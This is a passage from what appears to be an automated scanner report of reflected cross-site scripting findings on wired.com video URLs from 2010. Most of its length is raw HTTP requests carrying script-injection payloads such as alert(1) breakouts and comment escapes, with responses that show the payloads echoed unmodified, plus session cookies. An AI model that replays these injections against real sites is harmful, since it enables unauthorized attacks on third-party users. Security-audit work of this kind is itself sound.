This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/171644057439664"-alert(1)-"96d7430c046/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:51:18 GMT Date: Mon, 22 Nov 2010 00:46:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab2ab"-alert(1)-"be5e8af1f82 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suitsab2ab"-alert(1)-"be5e8af1f82/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:51:08 GMT Date: Mon, 22 Nov 2010 00:46:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72896"-alert(1)-"e1d2c6c34d2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cast-and-crew-talk-tron-reboot-secondskin-light-suits/67892278300172896"-alert(1)-"e1d2c6c34d2 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:51:42 GMT Date: Mon, 22 Nov 2010 00:46:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2096"><a>cac0c655b17 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoc2096"><a>cac0c655b17/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29429 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:59 GMT Date: Mon, 22 Nov 2010 00:40:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoc2096"><a>cac0c655b17 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8cb5c--><script>alert(1)</script>495ed423392 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video8cb5c--><script>alert(1)</script>495ed423392/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29464 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:17 GMT Date: Mon, 22 Nov 2010 00:42:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video8cb5c--><script>alert(1)</script>495ed423392/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afea"><a>5e215e36fac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos1afea"><a>5e215e36fac/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:46:53 GMT Date: Mon, 22 Nov 2010 00:42:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos1afea"><a>5e215e36fac c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 321c9"-alert(1)-"464fbd33c85 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos321c9"-alert(1)-"464fbd33c85/highlights/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=276 Expires: Mon, 22 Nov 2010 00:47:41 GMT Date: Mon, 22 Nov 2010 00:43:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106809
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5318"-alert(1)-"fd2d86b2125 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlightsd5318"-alert(1)-"fd2d86b2125/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:48:56 GMT Date: Mon, 22 Nov 2010 00:44:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4491f"><a>9cbbc7d96ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights4491f"><a>9cbbc7d96ba/1716440574/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:12 GMT Date: Mon, 22 Nov 2010 00:43:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights4491f"><a>9cbbc7d96ba"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ecf"-alert(1)-"04fbf34cd7d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574b0ecf"-alert(1)-"04fbf34cd7d/cowboys-and-aliens-trailer/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:30 GMT Date: Mon, 22 Nov 2010 00:44:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f802"-alert(1)-"db921583906 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer4f802"-alert(1)-"db921583906/681412282001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:58 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 257cc"-alert(1)-"009132a34db was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/highlights/1716440574/cowboys-and-aliens-trailer/681412282001257cc"-alert(1)-"009132a34db HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:49:50 GMT Date: Mon, 22 Nov 2010 00:45:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7e5d9--><script>alert(1)</script>896031a1734 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video7e5d9--><script>alert(1)</script>896031a1734/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29471 Vary: Accept-Encoding Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:47:35 GMT Date: Mon, 22 Nov 2010 00:42:48 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video7e5d9--><script>alert(1)</script>896031a1734/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45aaf"><a>68a6a917189 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video45aaf"><a>68a6a917189/latest-videos/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29436 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:07 GMT Date: Mon, 22 Nov 2010 00:42:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video45aaf"><a>68a6a917189 ss_latest-videos c_highlights"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f13c4"-alert(1)-"79997b02692 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosf13c4"-alert(1)-"79997b02692/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:16 GMT Date: Mon, 22 Nov 2010 00:44:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106771
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e5c"><a>188f8a9d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosc9e5c"><a>188f8a9d4e/highlights/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:56 GMT Date: Mon, 22 Nov 2010 00:42:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosc9e5c"><a>188f8a9d4e c_highlights"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f024"><a>62c7cdde06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/highlights5f024"><a>62c7cdde06/1716440574/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:26 GMT Date: Mon, 22 Nov 2010 00:44:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_highlights5f024"><a>62c7cdde06"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e35b7"-alert(1)-"02dcf902f19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
